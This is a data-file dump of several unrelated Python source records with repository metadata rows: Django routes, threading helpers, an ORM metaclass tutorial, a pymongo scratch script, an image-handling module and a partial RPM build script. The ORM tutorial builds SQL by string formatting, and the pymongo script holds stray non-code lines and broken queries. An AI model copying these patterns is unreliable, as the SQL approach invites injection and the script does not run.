path('op/feedback/<int:pk>', views.OpSqlOrderView.as_view({"put": "feedback"}), name='v1.sqlorders.feedback'),
path('op/close/<int:pk>', views.OpSqlOrderView.as_view({"put": "close"}), name='v1.sqlorders.close'),
path('op/review/<int:pk>', views.OpSqlOrderView.as_view({"put": "review"}), name='v1.sqlorders.review'),
# 生成工单任务
path('tasks/generate', views.GenerateTasksView.as_view(), name='v1.sqlorders.generate-tasks'),
path('tasks/get/<str:order_id>', views.GetTaskIdView.as_view(), name='v1.sqlorders.get-task-id'),
path('tasks/list/<str:task_id>', views.GetTasksListView.as_view(), name='v1.sqlorders.get-tasks-list'),
path('tasks/preview/<str:task_id>', views.GetTasksPreviewView.as_view(),
name='v1.sqlorders.get-tasks-preview'),
# 执行任务
path('tasks/execute/single', views.ExecuteSingleTaskView.as_view(), name='v1.sqlorders.execute-single-task'),
path('tasks/execute/multi', views.ExecuteMultiTasksView.as_view(), name='v1.sqlorders.execute-multi-tasks'),
path('tasks/throttle', views.ThrottleTaskView.as_view(), name='v1.sqlorders.throttle-task'),
path('tasks/result/<int:id>', views.GetTasksResultView.as_view(), name='v1.sqlorders.get-tasks-result'),
# Hook
path('hook', views.HookSqlOrdersView.as_view(), name='v1.sqlorders.hook-sqlorders'),
# download export files
path('export/download/<str:base64_filename>', views.DownloadExportFilesView.as_view(),
name='v1.sqlorders.download-export-files'),
# 上线版本
path('versions/get', views.ReleaseVersionsGet.as_view(), name='v1.sqlorders.versions.get'),
path('versions/list', views.ReleaseVersionsList.as_view(), name='v1.sqlorders.versions.list'),
path('versions/create', views.ReleaseVersionsCreate.as_view(),
name='v1.sqlorders.versions.create'),
path('versions/update/<int:key>', views.ReleaseVersionsUpdate.as_view(),
name='v1.sqlorders.versions.update'),
path('versions/delete/<int:id>', views.ReleaseVersionsDelete.as_view(),
name='v1.sqlorders.versions.delete'),
path('versions/view/<str:version>', views.ReleaseVersionsView.as_view(),
name='v1.sqlorders.versions.view'),
]
| 61.645833 | 114 | 0.707672 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1,402 | 0.46874 |
2bbef937c77131c86b085238ab54baf19c2dd111 | 3,119 | py | Python | pandacommon/pandautils/thread_utils.py | PanDAWMS/panda-common | 0617167abb2c84e964434a73e1f3bcebc9bbb526 | [
"Apache-2.0"
] | 1 | 2020-04-17T10:25:08.000Z | 2020-04-17T10:25:08.000Z | pandacommon/pandautils/thread_utils.py | PanDAWMS/panda-common | 0617167abb2c84e964434a73e1f3bcebc9bbb526 | [
"Apache-2.0"
] | 4 | 2015-09-28T11:11:39.000Z | 2020-10-16T11:21:31.000Z | pandacommon/pandautils/thread_utils.py | PanDAWMS/panda-common | 0617167abb2c84e964434a73e1f3bcebc9bbb526 | [
"Apache-2.0"
] | 3 | 2015-04-06T13:23:43.000Z | 2018-01-19T09:11:35.000Z | import os
import threading
import socket
import datetime
import random
import multiprocessing
class GenericThread(threading.Thread):
def __init__(self, **kwargs):
threading.Thread.__init__(self, **kwargs)
self.hostname = socket.gethostname()
self.os_pid = os.getpid()
def get_pid(self):
"""
get host/process/thread identifier
"""
thread_id = self.ident if self.ident else 0
return '{0}_{1}-{2}'.format(self.hostname, self.os_pid, format(thread_id, 'x'))
# map with lock
class MapWithLockAndTimeout(dict):
def __init__(self, *args, **kwargs):
# set timeout
if 'timeout' in kwargs:
self.timeout = kwargs['timeout']
del kwargs['timeout']
else:
self.timeout = 10
self.lock = threading.Lock()
dict.__init__(self, *args, **kwargs)
# get item regardless of freshness to avoid race-condition in check->get
def __getitem__(self, item):
with self.lock:
ret = dict.__getitem__(self, item)
return ret['data']
def __setitem__(self, item, value):
with self.lock:
dict.__setitem__(self, item, {'time_stamp': datetime.datetime.utcnow(),
'data': value})
# check data by taking freshness into account
def __contains__(self, item):
with self.lock:
try:
ret = dict.__getitem__(self, item)
if ret['time_stamp'] > datetime.datetime.utcnow() - datetime.timedelta(minutes=self.timeout):
return True
except Exception:
pass
return False
# weighted lists
class WeightedLists(object):
def __init__(self, lock):
self.lock = multiprocessing.Lock()
self.data = multiprocessing.Queue()
self.data.put(dict())
self.weights = multiprocessing.Queue()
self.weights.put(dict())
def __len__(self):
with self.lock:
l = 0
data = self.data.get()
for item in data:
l += len(data[item])
self.data.put(data)
return l
def add(self, weight, list_data):
if not list_data or weight <= 0:
return
with self.lock:
data = self.data.get()
weights = self.weights.get()
item = len(weights)
weights[item] = weight
data[item] = list_data
self.weights.put(weights)
self.data.put(data)
def pop(self):
with self.lock:
weights = self.weights.get()
if not weights:
self.weights.put(weights)
return None
item = random.choices(list(weights.keys()), weights=list(weights.values()))[0]
data = self.data.get()
d = data[item].pop()
# delete empty
if not data[item]:
del data[item]
del weights[item]
self.weights.put(weights)
self.data.put(data)
return d
| 29.149533 | 109 | 0.54665 | 2,983 | 0.956396 | 0 | 0 | 0 | 0 | 0 | 0 | 312 | 0.100032 |
2bc00265a709828bcb44535b1333cf0cc4954225 | 4,456 | py | Python | 09WebFramework/day04/basic04.py | HaoZhang95/PythonAndMachineLearning | b897224b8a0e6a5734f408df8c24846a98c553bf | [
"MIT"
] | 937 | 2019-05-08T08:46:25.000Z | 2022-03-31T12:56:07.000Z | 09WebFramework/day04/basic04.py | Sakura-gh/Python24 | b97e18867264a0647d5645c7d757a0040e755577 | [
"MIT"
] | 47 | 2019-09-17T10:06:02.000Z | 2022-03-11T23:46:52.000Z | 09WebFramework/day04/basic04.py | Sakura-gh/Python24 | b97e18867264a0647d5645c7d757a0040e755577 | [
"MIT"
] | 354 | 2019-05-10T02:15:26.000Z | 2022-03-30T05:52:57.000Z | """
ORM是django的核心思想, object-related-mapping对象-关系-映射
ORM核心就是操作数据库的时候不再直接操作sql语句,而是操作对象
定义一个类,类中有uid,username等类属型,sql语句insert修改的时候直接插入这个User对象
"""
# ORM映射实现原理,通过type修改类对象信息
# 定义这个元类metaclass
class ModelMetaclass(type):
def __new__(cls, name, bases, attrs):
# name --> User
# bases --> object
# attrs --> {
# "uid" :('uid', "int unsigned"),
# "name": ('username', "varchar(30)"),
# "email": ('email', "varchar(30)"),
# "password": ('password', "varchar(30)"),
# "__init__": xxx,
# "save": xxx2,
# }
mappings = dict()
# 判断是否需要保存
for k, v in attrs.items():
# 判断是否是元组类型
if isinstance(v, tuple):
print('Found mapping: %s ==> %s' % (k, v))
mappings[k] = v
# 删除这些已经在字典中存储的属性
for k in mappings.keys():
attrs.pop(k) # 等于del attrs[k]
# 将之前的uid/name/email/password以及对应的对象引用、类名字
# attrs = {
# "__init__": xxxx,
# "save": xxxx2,
# "__mappings__": {
# "uid": ('uid', "int unsigned"),
# "name": ('username', "varchar(30)"),
# ""email: ('email', "varchar(30)"),
# "password": ('password', "varchar(30)")
# },
# "__table__": "User"
# }
attrs['__mappings__'] = mappings # 保存属性和列的映射关系
attrs['__table__'] = name # 假设表名和类名一致
return type.__new__(cls, name, bases, attrs)
class User(metaclass=ModelMetaclass):
uid = ('uid', "int unsigned")
name = ('username', "varchar(30)")
email = ('email', "varchar(30)")
password = ('password', "varchar(30)")
# 当指定元类之后,以上的类属性将不在类中,而是在__mappings__属性指定的字典中存储
# 以上User类中有
# __mappings__ = {
# "uid": ('uid', "int unsigned")
# "name": ('username', "varchar(30)")
# "email": ('email', "varchar(30)")
# "password": ('password', "varchar(30)")
# }
# __table__ = "User"
# 参数名是kwargs,不是**kwargs,**只是告诉解释器将传来的参数变为字典
# for循环遍历__new__返回的attrs字典,实现实例对象的属性和方法赋值
def __init__(self, **kwargs):
for name, value in kwargs.items():
setattr(self, name, value)
def save(self):
fields = [] # ["uid", "username"...]
args = [] #[12345, "laowang"...]
# 创建的实例对象中没有__mapping__,去类对象中找
# k --> uid, v --> 12345
for k, v in self.__mappings__.items():
fields.append(v[0])
args.append(getattr(self, k, None))
args_temp = list()
for temp in args:
if isinstance(temp, int):
# 判断如果是数字类型
args_temp.append(str(temp))
elif isinstance(temp, str):
# 判断如果是字符串类型
args_temp.append("""'%s'""" % temp)
# sql = 'insert into %s (%s) values (%s);' \
# % (self.__table__, ','.join(fields), ','.join([str(i) for i in args]))
# 使用",".join为每一个字段后都插入逗号分隔
sql = 'insert into %s (%s) values (%s)' % (self.__table__, ','.join(fields), ','.join(args_temp))
print('SQL: %s' % sql)
# 抽取为基类,再创建User2这个类,就直接让其继承Model类
class Model(object, metaclass=ModelMetaclass):
def __init__(self, **kwargs):
for name, value in kwargs.items():
setattr(self, name, value)
def save(self):
fields = []
args = []
for k, v in self.__mappings__.items():
fields.append(v[0])
args.append(getattr(self, k, None))
args_temp = list()
for temp in args:
# 判断入如果是数字类型
if isinstance(temp, int):
args_temp.append(str(temp))
elif isinstance(temp, str):
args_temp.append("""'%s'""" % temp)
sql = 'insert into %s (%s) values (%s)' % (self.__table__, ','.join(fields), ','.join(args_temp))
print('SQL: %s' % sql)
class User2(Model):
uid = ('uid', "int unsigned")
name = ('username', "varchar(30)")
email = ('email', "varchar(30)")
password = ('password', "varchar(30)")
def test01():
u = User(uid=12345, name='Michael', email='test@orm.org', password='my-pwd')
# print(u.__dict__)
u.save()
def test02():
list = ['12356', "laowang", "email"]
print(",".join(list))
def main():
# test01()
test02()
if __name__ == '__main__':
main()
| 28.748387 | 105 | 0.507855 | 4,347 | 0.849355 | 0 | 0 | 0 | 0 | 0 | 0 | 2,605 | 0.508988 |
2bc366f88045d8e0fb26fb566dafc8ab43dfdefc | 146 | py | Python | eventi/core/admin.py | klebercode/lionsclub | 60db85d44214561d20f85673e8f6c047fab07ee9 | [
"MIT"
] | 1 | 2022-02-28T00:07:14.000Z | 2022-02-28T00:07:14.000Z | eventi/core/admin.py | klebercode/lionsclub | 60db85d44214561d20f85673e8f6c047fab07ee9 | [
"MIT"
] | null | null | null | eventi/core/admin.py | klebercode/lionsclub | 60db85d44214561d20f85673e8f6c047fab07ee9 | [
"MIT"
] | null | null | null | # coding: utf-8
from django.contrib import admin
from eventi.core.models import Club, Info
admin.site.register(Club)
admin.site.register(Info)
| 16.222222 | 41 | 0.780822 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 15 | 0.10274 |
2bc59939181c875a61b3f943ea4d563e7976ef42 | 1,075 | py | Python | LAB/05/0530_PyMongo.py | LegenDad/KTM_Lab | 09a1671b1dfe9b667008279ef41a959f08babbfc | [
"MIT"
] | null | null | null | LAB/05/0530_PyMongo.py | LegenDad/KTM_Lab | 09a1671b1dfe9b667008279ef41a959f08babbfc | [
"MIT"
] | null | null | null | LAB/05/0530_PyMongo.py | LegenDad/KTM_Lab | 09a1671b1dfe9b667008279ef41a959f08babbfc | [
"MIT"
] | null | null | null | # -*- coding: utf-8 -*-
"""
Created on Thu May 31 09:09:26 2018
@author: Jeon
"""
!pip search pymongo
!pip install pymongo
import pymongo
mgclient = pymongo.MongoClient("localhost", 27017)
# check start mogodb (mongod)
mgclient.database_names()
testdb = mgclient.testdb
testdb_col = testdb.items
data= { "name":"cola", "pty":5, "price":500}
testdb_col.insert(data)
testdb.supermarket.insert(data)
print(mgclient.database_names())
for doc in testdb.supermarket.find():
print(doc)
games
heros Tracer
userNum
tracer = {"games":"Overwatch", "hero":"Tracer", "userNum":8888}
testdb.games.insert(tracer)
for doc in testdb.games.find():
print(doc)
for post in testdb.supermarket.find():
print(post)
print(testdb.supermakret.find({"price":500}).count())
print(testdb.supermarket.find({"name":'GS'}).count())
print(testdb.supermarket.find({"pty":1}).count())
print(testdb.supermarket.find({"pty": {"gt":3} }).count())
print(testdb.supermakret.find({"price": {"gt":3} }).count())
for post in testdb.supermakret.find().sort('name'):
print(post) | 19.545455 | 63 | 0.692093 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 234 | 0.217674 |
2bc5fd37e006f771bdbfbce48ca1e4e8865d7cc3 | 10,285 | py | Python | src/animasnd/image.py | N-z0/commonz | 275c48ef6aac32f0d809a96e56b0b0c254686747 | [
"Unlicense"
] | null | null | null | src/animasnd/image.py | N-z0/commonz | 275c48ef6aac32f0d809a96e56b0b0c254686747 | [
"Unlicense"
] | null | null | null | src/animasnd/image.py | N-z0/commonz | 275c48ef6aac32f0d809a96e56b0b0c254686747 | [
"Unlicense"
] | null | null | null | #!/usr/bin/env python3
#coding: utf-8
### 1st line allows to execute this script by typing only its name in terminal, with no need to precede it with the python command
### 2nd line declaring source code charset should be not necessary but for exemple pydoc request it
__doc__ = "provide images support"#information describing the purpose of this module
__status__ = "Development"#should be one of 'Prototype' 'Development' 'Production' 'Deprecated' 'Release'
__version__ = "3.0.0"# version number,date or about last modification made compared to the previous version
__license__ = "public domain"# ref to an official existing License
__date__ = "2008"#started creation date / year month day
__author__ = "N-zo syslog@laposte.net"#the creator origin of this prog,
__maintainer__ = "Nzo"#person who curently makes improvements, replacing the author
__credits__ = []#passed mainteners and any other helpers
__contact__ = "syslog@laposte.net"# current contact adress for more info about this file
### images modules
#import pygame # designed for writing games. (is not specific to images)
#import scipy # deprecating image I/O functionality and will be removed
### Pillow was the main library used by Scipy for images.
#import imageio # variety of plugins for many images formats.
### Pillow is also the main plugin of imageio for common images
### PIL (Python Image Library) been late adapted on Python3
### then a fork for Python 3 named Pillow been made
### so Pillow and PIL are almost the same
from PIL import Image
from PIL import ImageChops
from PIL import ImageDraw
from PIL import ImageFont
from PIL import ImageOps
from PIL import ImageFilter
### OpenCV (OpenSource Computer Vision) is available in Debian repo
### But no official OpenCV packages released by OpenCV.org on PyPI
### But on PyPI the not official opencv-contrib-python includes all OpenCV functionality.
import cv2
#import cairo # 2D graphics library
### others required modules
import numpy # use for exporting image as array
### PIL Image modes:
BITMAP_MODE = '1' #1b this binary mode is not respected, pixels values are stored with 0 or 255.
GREY_MODE = 'L' #1o shade of grey varies from 0 to 256
LA_MODE = 'LA' # same as L mode with alpha
INDEX_MODE = 'P' #1o the number of colors in a palette may vary, it is not always 256 colors,
RGB_MODE = 'RGB' #3o true color
HSV_MODE = 'HSV' #3o Hue, Saturation, Value
RGBA_MODE = 'RGBA' #4o true color with transparency
INT_MODE = 'I' #4o(signed integer) why signed ?? anyway, I did not find any image format with this mode
FLOAT_MODE = 'F' #4o(floating point) I did not find any image format with this mode.
### resize resample:
### If omitted, or if the image has mode “1” or “P”, it is set PIL.Image.NEAREST.
NEAREST=Image.NEAREST# (use nearest pixels neighbour)
BILINEAR=Image.BILINEAR# (linear pixels interpolation)
BICUBIC=Image.BICUBIC# (cubic spline pixels interpolation) **the most interesting***
LANCZOS=Image.LANCZOS# (a high-quality downsampling pixels filter)
### transpose methods:
FLIP_HORIZONTALLY=Image.FLIP_LEFT_RIGHT
FLIP_VERTICALLY=Image.FLIP_TOP_BOTTOM
ROTATE_90=Image.ROTATE_90
ROTATE_180=Image.ROTATE_180
ROTATE_270=Image.ROTATE_270
TRANSPOSE=Image.TRANSPOSE
### text alignement
ALIGN_LEFT="left"
ALIGN_CENTER="center"
ALIGN_RIGHT="right"
### Direction of the text.
### not supported without libraqm
DIR_RTL="rtl" # (right to left)
DIR_LTR="ltr" # (left to right)
DIR_TTB="ttb" # (top to bottom). Requires libraqm.
### pixel location Indexes
X=0
Y=1
### pixel compo Indexes
R=0
G=1
B=2
A=3
### RGB basics colors
RED=(255,0,0)
GREEN=(0,255,0)
BLUE=(0,0,255)
BLACK=(0,0,0)
WHITE=(255,255,255)
### disable DecompressionBomb safety
#Image.MAX_IMAGE_PIXELS = 200000**2
#Image.warnings.simplefilter('ignore', Image.DecompressionBombWarning)
def image_show(imagefile, title=None):
	"""Display an image file in an on-screen window until any key is pressed."""
	# read the file as-is (alpha channel preserved, no colorspace coercion)
	picture = cv2.imread(imagefile, cv2.IMREAD_UNCHANGED)
	cv2.imshow(title, picture)
	# block until the user presses any key, then tear the window down
	cv2.waitKey(0)
	cv2.destroyAllWindows()
class Bitmap :
	"""In-memory bitmap wrapper around a PIL Image.
	All mutating operations replace/alter self.img in place; getters delegate to PIL."""
	def __init__(self, mode, size, color):
		"""mode: pixel format (one of the *_MODE constants), size: (x,y) pixel dimensions, color: background fill"""
		self.img= Image.new( mode, size, color )
		#self.filename= self.img.filename
		#self.size= self.img.size
		#self.fmt = self.img.format
		#self.mode = self.img.mode
		#self.info = self.img.info
	def get_info(self):
		"""get the extra metadata info dict attached to the image"""
		return self.img.info
	def get_size(self):
		"""get the (x,y) pixel size of the image"""
		return self.img.size
	def get_mode(self):
		"""get the image pixel format (see the *_MODE constants)"""
		return self.img.mode
	def get_colors(self):
		"""return the quantity of pixels for each color (delegates to PIL getcolors)"""
		return self.img.getcolors()
	def show(self,title=None):
		"""display the image in a new window (external viewer)"""
		self.img.show(title)
	def get_pixel(self,position):
		"""get the value of the image pixel at (x,y) position"""
		return self.img.getpixel(position)
	def set_pixel(self,position,valu):
		"""change the value of the image pixel at (x,y) position"""
		self.img.putpixel(position,valu)
	def set_alpha(self,alpha):
		"""change the transparency (alpha band) of the image"""
		self.img.putalpha(alpha)
	def resize(self,new_size,resample=NEAREST):
		"""resize the image to the (x,y) new_size using the given resample filter"""
		self.img = self.img.resize(new_size,resample)
	def transpose(self,direction):
		"""rotate / flip the image
		FLIP_VERTICALLY adapts the image for openGL
		ROTATE_270 then FLIP_VERTICALLY adapts the image for a numpy array"""
		self.img = self.img.transpose(direction)
	def offset(self,offset):
		"""displace the image content by an (x,y) pixel move (ImageChops wraps around edges)"""
		self.img= ImageChops.offset(self.img,offset[X],offset[Y])
	def crop(self,cut):
		"""cut the image by a (left,top,right,bottom) box"""
		self.img= self.img.crop(cut)
	def convert(self,mode):
		"""convert image pixels into the given mode"""
		# ImageOps.grayscale(self.img) = self.img.convert('L')
		# image.convert(mode='F') # transforms the image values into float, but without putting them between 0.0 and 1.0
		self.img= self.img.convert(mode)
	def save(self,output_path):
		"""save image in the default format (PNG)"""
		self.save_png(output_path)
	def save_gif(self,output_path):
		"""save image in .gif format"""
		self.img.save(output_path)
	def save_bmp(self,output_path):
		"""save image in .bmp format (RLE compression)"""
		self.img.save(output_path,compression='bmp_rle')
	def save_tga(self,output_path):
		"""save image in .tga format"""
		self.img.save(output_path)
	def save_tiff(self,output_path):
		"""save image in .tif format (deflate compression)"""
		self.img.save(output_path,compression="tiff_deflate")
	def save_png(self,output_path):
		"""save image in .png format (optimized encoding)"""
		self.img.save(output_path,"PNG",optimize=True)
	def tile(self,scale):#scale mini is (1,1)
		"""repeat the image horizontally and vertically scale=(x,y) times"""
		new_size=( self.img.size[X]*int(scale[X]) , self.img.size[Y]*int(scale[Y]) )
		result = Image.new(self.img.mode,new_size)# create a new image
		#print(self.img.size,scale)
		# paste one copy at each grid position, stepping by the source size
		for left in range(0,new_size[X],self.img.size[X]):
			for top in range(0,new_size[Y],self.img.size[Y]):
				#print(left, top)
				result.paste(self.img, (left,top))
		self.img= result
	def get_gl_data(self):
		"""return the raw image bytes, suitable for uploading as an opengl texture"""
		data = self.img.tobytes("raw",self.img.mode)# tostring() has been removed. Please call tobytes() instead.
		#data = self.img.getData()
		return data
	def get_array(self,tip):
		"""return image data as a numpy array of dtype tip"""
		return numpy.asarray(self.img,dtype=numpy.dtype(tip))
	def mask(self,mask_img):
		"""use the grey scale mask_img pixels as the alpha (transparency) band of this image"""
		self.img.putalpha(mask_img.img)
	def blend(self,other_img,mix_factor=0.5):
		"""no change if mix_factor=0, if mix_factor=1 the image is completely replaced by the other_img"""
		self.img= Image.blend(self.img,other_img.img,mix_factor)
	def compose(self,other_img,alpha_img):
		"""same as blend but uses the per-pixel alpha values of alpha_img instead of a single mix_factor"""
		self.img= Image.composite(self.img,other_img.img,alpha_img.img)
	def overwrite(self,other_img):
		"""write the other image on top of self image (alpha compositing)"""
		self.img= Image.alpha_composite(self.img,other_img.img)
	def smooth(self,qantum):
		"""make image edges and points less sharp, applying the smoothing filter qantum times"""
		for q in range(qantum) :
			self.img= self.img.filter(ImageFilter.SMOOTH_MORE)
			#self.img= self.img.filter(ImageFilter.BLUR)
class Bitmap_File(Bitmap) :
	"""Bitmap loaded from an existing image file on disk."""
	def __init__(self,image_file):
		"""image_file: pathname of the image to load.
		Raises an exception if the file is corrupt or not a supported image format."""
		### verify() checks file integrity without decoding the pixel data,
		### but leaves the Image object unusable afterwards.
		### the context manager closes the probe handle (the original code
		### leaked the first open file descriptor until garbage collection).
		with Image.open(image_file) as probe:
			probe.verify()
		### after verify(), the image file must be re-opened to actually use it
		self.img = Image.open(image_file)
class Bitmap_Text(Bitmap) :
	"""Bitmap used as a canvas for rendering text with a truetype font."""
	def __init__(self,font_name,font_size,background_color,text_color,contour_color,contour_size):
		"""Store the rendering settings and start from a 1x1 placeholder canvas."""
		self.font = ImageFont.truetype(font=font_name,size=font_size)
		self.background_color = background_color
		self.text_color = text_color
		# contour_color is stored but not rendered here -- presumably meant
		# for stroke/outline drawing; kept for API compatibility
		self.contour_color = contour_color
		self.contour_size = contour_size
		# placeholder image, replaced on the first call to write()
		self.img = Image.new(RGBA_MODE,(1,1),background_color)
	def write(self,text,dir,align,spacing):
		"""Render text onto a freshly sized canvas using the stored font/colors.
		dir/align/spacing are forwarded to PIL ImageDraw.text."""
		rows = text.splitlines()
		# measure each line once: list of (width, height) pairs
		metrics = [self.font.getsize(row) for row in rows]
		margin = self.contour_size*2
		canvas_w = max((w for w,h in metrics),default=0) + margin
		canvas_h = sum(h for w,h in metrics) + margin + (len(rows)-1)*spacing
		self.img = Image.new(RGBA_MODE,(canvas_w,canvas_h),self.background_color)
		pen = ImageDraw.Draw(self.img)
		pen.text((self.contour_size,self.contour_size),text,font=self.font,fill=self.text_color,spacing=spacing,direction=dir,align=align)
| 31.940994 | 198 | 0.734565 | 6,206 | 0.602934 | 0 | 0 | 0 | 0 | 0 | 0 | 5,575 | 0.54163 |
2bca9532a8c9a9fdc0dfa94bcf1da0e809d38422 | 42,627 | py | Python | scripts/buildrpm.py | fstab50/branchdiff | b438a70403d91bda1f14df884134c7cb1d980837 | [
"MIT"
] | 2 | 2019-03-05T04:37:49.000Z | 2021-04-08T04:03:31.000Z | scripts/buildrpm.py | fstab50/branchdiff | b438a70403d91bda1f14df884134c7cb1d980837 | [
"MIT"
] | 4 | 2018-11-22T17:57:42.000Z | 2019-09-23T22:20:21.000Z | scripts/buildrpm.py | fstab50/branchdiff | b438a70403d91bda1f14df884134c7cb1d980837 | [
"MIT"
] | 1 | 2021-09-13T02:03:42.000Z | 2021-09-13T02:03:42.000Z | #!/usr/bin/env python3
"""
Summary:
buildrpm (python3): branchdiff binary operating system package (.rpm, Redhat, Redhat-based systems)
- Automatic determination of version to be built
- Build version can optionally be forced to a specific version
- Resulting rpm ackage produced in packaging/rpm directory
- To execute build, from the directory of this module, run:
.. code-block:: python
$ cd ../<project dir>
$ make buildrpm
Author:
Blake Huber
Copyright 2017-2018, All Rights Reserved.
License:
General Public License v3
Additional terms may be found in the complete license agreement:
https://bitbucket.org/blakeca00/branchdiffthon3/src/master/LICENSE.md
OS Support:
- Redhat, CentOS, Fedora, Redhat-based variants
Dependencies:
- Requires python3, developed and tested under python3.6
"""
import argparse
import inspect
import json
import os
import sys
import subprocess
import tarfile
import fileinput
from shutil import copy2 as copyfile
from shutil import copytree, rmtree, which
import distro
import docker
import loggers
from pyaws.utils import stdout_message, export_json_object
from pyaws.colors import Colors
from common import debug_header
try:
from pyaws.core.oscodes_unix import exit_codes
except Exception:
from pyaws.core.oscodes_win import exit_codes # non-specific os-safe codes
# globals
PROJECT = 'branchdiff'                                  # name of the os package produced by this script
module = os.path.basename(__file__)                     # this script's filename (shown in the help menu)
TMPDIR = '/tmp/build'                                   # scratch location where the build tree is assembled
VOLMNT = '/tmp/rpm'                                     # host-side mount point shared with the build container
CONTAINER_VOLMNT = '/mnt/rpm'                           # the same volume as seen from inside the container
DISTRO_LIST = ['centos7', 'amazonlinux', 'redhat7']     # docker os images accepted by --distro
# docker
# NOTE: connects to the docker daemon at import time; importing this module
# fails if the daemon socket is unreachable
dclient = docker.from_env()
# formatting
act = Colors.ORANGE                     # accent highlight (bright orange)
bd = Colors.BOLD + Colors.WHITE         # title formatting
bn = Colors.CYAN                        # color for main binary highlighting
lk = Colors.DARK_BLUE                   # color for filesystem path confirmations
red = Colors.RED                        # color for failed operations
yl = Colors.GOLD3                       # color when copying, creating paths
rst = Colors.RESET                      # reset all color, formatting
arrow = yl + Colors.BOLD + '-->' + rst  # colored arrow used in copy confirmations
# global logger
logger = loggers.getLogger('1.0')       # '1.0' is the version tag passed to the logger factory
def git_root():
    """
    Summary.
        Locate the top-level directory of the current git repository
    Returns:
        absolute repository root path, TYPE: str ('' outside a repository)
    """
    # stderr is discarded so a non-repo cwd yields an empty string
    return subprocess.getoutput('git rev-parse --show-toplevel 2>/dev/null').strip()
def help_menu():
    """
    Summary.
        Prints the command line parameter options (help menu) to stdout
    Returns:
        True, TYPE: bool
    """
    # menu text embeds ansi color codes via the module-level bd/act/rst vars
    menu = '''
                      ''' + bd + module + rst + ''' help contents
  ''' + bd + '''DESCRIPTION''' + rst + '''
          Builds an installable package (.rpm) for Redhat, CentOS, and Fedora
          variants of the Linux Operatining System
  ''' + bd + '''OPTIONS''' + rst + '''
        $ python3 ''' + act + module + rst + ''' --build  [ --force-version <VERSION> ]
                     -b, --build
                     -d, --distro <value>
                    [-D, --debug  ]
                    [-f, --force  ]
                    [-h, --help   ]
                    [-p, --parameter-file <value> ]
                    [-s, --set-version <value>  ]
        ''' + bd + '''-b''' + rst + ''', ''' + bd + '''--build''' + rst + ''':  Build Operating System package (.rpm, Redhat systems)
            When given without the --set-version parameter switch, build ver-
            sion is extracted from the project repository information
        ''' + bd + '''-d''' + rst + ''', ''' + bd + '''--debug''' + rst + ''':  Debug mode, verbose output.
        ''' + bd + '''-d''' + rst + ''', ''' + bd + '''--distro''' + rst + ''' <value>:  Specifies the Docker Operating System Image to
            use when building. Allowable Values:
                    - centos7 (DEFAULT)
                    - amazonlinux
                    - redhat7
        ''' + bd + '''-F''' + rst + ''', ''' + bd + '''--force''' + rst + ''':  When given, overwrites any pre-existing build artifacts.
            DEFAULT: False
        ''' + bd + '''-h''' + rst + ''', ''' + bd + '''--help''' + rst + ''':  Print this help menu
        ''' + bd + '''-p''' + rst + ''', ''' + bd + '''--parameter-file''' + rst + ''' <value>:  Optional json format configuration file
            containing all configuration parameters to build rpm package (key,
            value format)
        ''' + bd + '''-s''' + rst + ''', ''' + bd + '''--set-version''' + rst + ''' (string):  When given, overrides all version infor-
            mation contained in the project to build the exact version speci-
            fied by VERSION parameter
    '''
    print(menu)
    return True
def clean(directory, debug):
    """
    Summary.
        rm residual python bytecode artifacts (.pyc, .pyo) from a build directory
    Args:
        :directory (str): path of the directory to scan (non-recursive)
        :debug (bool): when True, print the artifact list before removal
    Returns:
        True, TYPE: bool
    """
    # endswith accepts a tuple, so one pass covers both suffixes
    bytecode_list = [
        x for x in os.listdir(directory) if x.endswith(('.pyc', '.pyo'))
    ]
    if debug:
        stdout_message(
            message=f'bytecode_list contents: {bytecode_list}',
            prefix='DEBUG'
        )
    for artifact in bytecode_list:
        os.remove(os.path.join(directory, artifact))
        logger.info('Artifact {} cleaned from {}'.format(artifact, directory))
    return True
def current_branch(path):
    """
    Summary.
        Identify the active git branch of the repository at path
    Args:
        :path (str): filesystem path to a git repository working tree root
    Returns:
        current branch name, TYPE: str ('' if the branch cannot be parsed)
    Raises:
        Exception: when path is not the root of a git repository
    """
    pwd = os.getcwd()
    os.chdir(path)
    try:
        if '.git' not in os.listdir('.'):
            raise Exception(
                '%s: Unable to identify current branch - path not a git repository: %s' %
                (inspect.stack()[0][3], path))
        # 'git branch' marks the active branch with a leading '* '
        branch = subprocess.getoutput('git branch').split('*')[1].split('\n')[0][1:]
    except IndexError:
        logger.exception(
            '%s: problem retrieving git branch for %s' %
            (inspect.stack()[0][3], path)
        )
        return ''
    finally:
        # always restore the caller's working directory; the original
        # implementation left the process chdir'd on both error paths
        os.chdir(pwd)
    return branch
def read(fname):
    """
    Summary.
        Return the contents of fname, resolved relative to the directory
        containing the running script (sys.argv[0])
    Args:
        :fname (str): file name relative to the script directory
    Returns:
        file contents, TYPE: str
    """
    basedir = os.path.dirname(sys.argv[0])
    # context manager closes the handle (original implementation leaked it)
    with open(os.path.join(basedir, fname)) as f:
        return f.read()
def masterbranch_version(version_module):
    """
    Summary.
        Extract the __version__ value from version_module.
        NOTE(review): the 'git checkout master' step is commented out in the
        original, so the value actually read comes from the current branch --
        confirm whether the master checkout should be restored.
    Args:
        :version_module (str): filename of the module containing __version__
    Returns:
        version string | None on any failure, TYPE: str
    """
    branch = current_branch(git_root())
    try:
        # parse: __version__="x.y.z"
        masterversion = read(version_module).split('=')[1].strip().strip('"')
        # return to working branch
        # (original message used '%s'.format(branch) -- a broken template that
        # printed literal '%s'; fixed with an f-string)
        stdout_message(f'Returning to working branch: checkout {branch}')
        stdout_message(subprocess.getoutput(f'git checkout {branch}'))
    except Exception:
        return None
    return masterversion
def current_version(binary, version_modpath):
    """
    Summary:
        Returns the installed package version of binary when it is locally
        installed; otherwise compares the working branch __version__ to the
        master branch version and returns the greater
    Args:
        :binary (str): Name of main project executable
        :version_modpath (str): path to the module containing __version__
    Returns:
        current version number of the project, TYPE: str
    """
    # NOTE(review): module-level __version__ is not visibly defined in this
    # file -- confirm it is provided elsewhere before relying on this path
    if which(binary):
        cmd = None
        os_type = distro.linux_distribution()[0]
        if os_type == 'Redhat' and which('yum'):
            cmd = 'yum info ' + binary + ' 2>/dev/null | grep Version'
        elif os_type == 'Redhat' and which('rpm'):
            cmd = 'rpm -qi ' + binary + ' 2>/dev/null | grep Version'
        elif os_type == 'Ubuntu' and which('apt'):
            cmd = 'apt show ' + binary + ' 2>/dev/null | grep Version | head -n1'
        try:
